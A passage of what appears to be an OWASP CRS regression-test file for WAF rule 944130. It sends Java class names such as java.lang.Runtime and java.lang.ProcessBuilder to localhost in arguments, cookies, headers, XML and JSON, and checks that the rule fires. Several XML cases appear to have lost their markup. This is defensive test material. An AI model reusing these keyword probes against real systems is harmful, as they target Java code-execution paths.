"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-323 + desc: "Cookie name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-324 + desc: "Request header test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-325 + desc: "XML attribute value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-326 + desc: "XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-327 + desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-328 + desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-329 + desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-330 + desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-331 + desc: "Argument test includes 
keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-332 + desc: "Argument name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-333 + desc: "Cookie test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-334 + desc: "Cookie name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-335 + desc: "Request header test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.reflect + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-336 + desc: "XML attribute value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-337 + desc: "XML element value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-338 + desc: "Nested XML element value 
includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-339 + desc: "Content-Type text/plain includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-340 + desc: "Content-Type application/json arg value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-341 + desc: "Content-Type application/json arg name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-342 + desc: "Argument test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-343 + desc: "Argument name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-344 + desc: "Cookie test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-345 + desc: "Cookie name 
includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-346 + desc: "Request header test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-347 + desc: "XML attribute value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-348 + desc: "XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-349 + desc: "Nested XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-350 + desc: "Content-Type text/plain includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-351 + desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log_contains: 
"id \"944130\"" + - test_title: 944130-352 + desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-353 + desc: "Argument test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-354 + desc: "Argument name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-355 + desc: "Cookie test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-356 + desc: "Cookie name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-357 + desc: "Request header test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-358 + desc: "XML attribute value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: 
"HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-359 + desc: "XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-360 + desc: "Nested XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-361 + desc: "Content-Type text/plain includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-362 + desc: "Content-Type application/json arg value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-363 + desc: "Content-Type application/json arg name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-364 + desc: "Argument test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-365 + desc: "Argument name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + 
data: "java.lang.StringBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-366 + desc: "Cookie test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-367 + desc: "Cookie name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-368 + desc: "Request header test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-369 + desc: "XML attribute value includes keyword java.lang.StringBuilder" + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-370 + desc: "XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-371 + desc: "Nested XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-372 + desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-373 + desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-374 + desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-375 + desc: "Argument test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - 